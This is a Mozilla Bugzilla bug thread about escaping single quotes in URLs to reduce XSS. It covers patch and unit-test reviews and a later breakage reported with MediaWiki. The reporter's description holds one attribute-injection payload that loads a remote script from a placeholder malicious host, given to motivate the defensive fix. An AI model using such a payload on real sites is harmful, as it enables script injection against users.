Closed Bug 376844 Opened 17 years ago Closed 17 years ago

Single quotes in URLs should be escaped

Categories

(Core :: Networking, defect)

Product:
Core
Component:
Networking
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: jwkbugzilla, Assigned: jwkbugzilla)

References

Details

Attachments

(2 files, 1 obsolete file)

Patch (checked in)
1.47 KB, patch
benjamin
: review+
Biesinger
: superreview+
Details | Diff | Splinter Review
Unit test (checked in)
1.13 KB, patch
Biesinger
: review+
Details | Diff | Splinter Review 
The current escape matrix goes back to bug 108575 and allows single quote character to stay unescaped in URLs. I propose to revert this change and always escape it as %27. This is not consistent with RFC2396 but I cannot think of any case where it will break something. The advantage: it will significantly reduce the number of exploitable XSS vulnerabilities.

Typical scenario: a web page uses REQUEST_URI in some attribute, e.g. form action. If the attribute value is enclosed in double quotes, escaping makes it impossible to break out of the attribute. If it uses single quotes however (very common) the attacker might inject the string |'style='-moz-binding:url(http://malicious.xbl.script/)| - Gecko will not escape single quotes and will not prevent this attack. Recent example: http://www.buayacorp.com/files/wordpress/wordpress-advisory.txt

You have the same problem with JavaScript, single quotes seem to be used for string literals even more often than double quotes. If the web page puts some URL parameter without proper encoding in such a string literal it might break out and inject JavaScript code.
Attachment #260952 - Flags: superreview?(darin.moz)
Attachment #260952 - Flags: review?(dougt)
Assignee: nobody → trev
Status: NEW → ASSIGNED
Blocks: xss
Attachment #260952 - Flags: superreview?(darin.moz) → superreview?(cbiesinger)
Comment on attachment 260952 [details] [diff] [review]
Patch (checked in)

a unit test would be nice
Attachment #260952 - Flags: superreview?(cbiesinger) → superreview+

        Attachment #261015 -
        Flags: review?(cbiesinger)

    
    

    
  
There is a problem - this behavior isn't consistent with encodeURIComponent() JavaScript function any more and causes for example test_default_index_handler.js (httpserver unit test) to fail. JavaScript has its own list of characters that shouldn't be escaped in js_uriUnescaped_ucstr variable (jsstr.c). The proper solution should be to remove single quotes from this list as well but this wouldn't conform the ECMA-262 spec. What should we do with it?

        Attachment #261015 -
        Flags: review?(cbiesinger) → review+

    
    

    
  
hm... would it help to make that test use nsINetUtil::escapeString?

    
    

    
  


  
Changes the unit test for HTTP server to use nsINetUtil so it is no longer affected by this URL encoding change.

        Attachment #261026 -
        Flags: review?(sayrer)

    
  

        Attachment #261026 -
        Flags: review?(sayrer) → review?(jwalden+bmo)

    
    

    
  
Comment on attachment 261026 [details] [diff] [review]
Patch for the httpserver unit test

Does this change match the semantics at the following location?  I'm not entirely sure, and ideally we should keep the code at the two locations reasonably synced to make verifying correctness easier.

http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/netwerk/test/httpserver/httpd.js&rev=1.4&mark=594-598#589

    
    

    
  
I discussed this with biesi on IRC already. The conclusion was that the comparison in this unit test isn't between the output of httpd.js and escaped file name but rather result of newURI and escaped file name so that the encoding method in httpd.js shouldn't matter. Which doesn't mean that we cannot take the same change for httpd.js (which will also make this note superfluous).

    
    

    
  
Comment on attachment 261026 [details] [diff] [review]
Patch for the httpserver unit test

(In reply to comment #7)

Okay; I've thought about it long enough that this makes sense to me, and yeah, changing the output escaping isn't necessary.

        Attachment #261026 -
        Flags: review?(jwalden+bmo) → review+

    
  

        Attachment #260952 -
        Flags: review?(dougt) → review?(benjamin)

    
  

        Attachment #260952 -
        Flags: review?(benjamin) → review+

    
  
Whiteboard: [checkin needed]

    
  

        Attachment #260952 -
        Attachment description: Patch → Patch (checked in)

    
  

        Attachment #261015 -
        Attachment description: Unit test → Unit test (checked in)

    
    

    
  
I checked in the first two patches. The third patch doesn't apply cleanly, and looks like it may not be needed any more. Wladimir, could you review that and post a new patch if needed? Clearing the checkin-needed status for now.
Whiteboard: [checkin needed]

    
    

    
  
Comment on attachment 261026 [details] [diff] [review]
Patch for the httpserver unit test

Looks like Jeff fixed this issue in bug 367214 already.

        Attachment #261026 -
        Attachment is obsolete: true

    
  
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED

    
  
Flags: in-testsuite+

    
    

    
  
(In reply to comment #0)
> This is not consistent with RFC2396 but I cannot think of any
> case where it will break something.

Apparently someone found a case where it breaks something, see bug 407172.

    
    

    
  
Yes, this breaks certain MediaWiki installations when people create pages titles with single quotes in them.  Unfortunately, my example page is behind a corporate firewall.
Depends on: 407172

    
    

    
  
It is heartwarming that Firefox tries to protect web servers from dangerous URLs. Once all other browsers die off, and direct socket programming is banned on earth[*], attackers will have no way to trick a vulnerable web server simply by sending it a crafted URL.

          You need to log in
          before you can comment on or make changes to this bug.
        






  

    
  







  

    

      
Attachment

      

      
      
      
      
    

    

      

        

          

            
General

            

              Creator: 



            

            
Created: 

            
Updated: 

            
Size: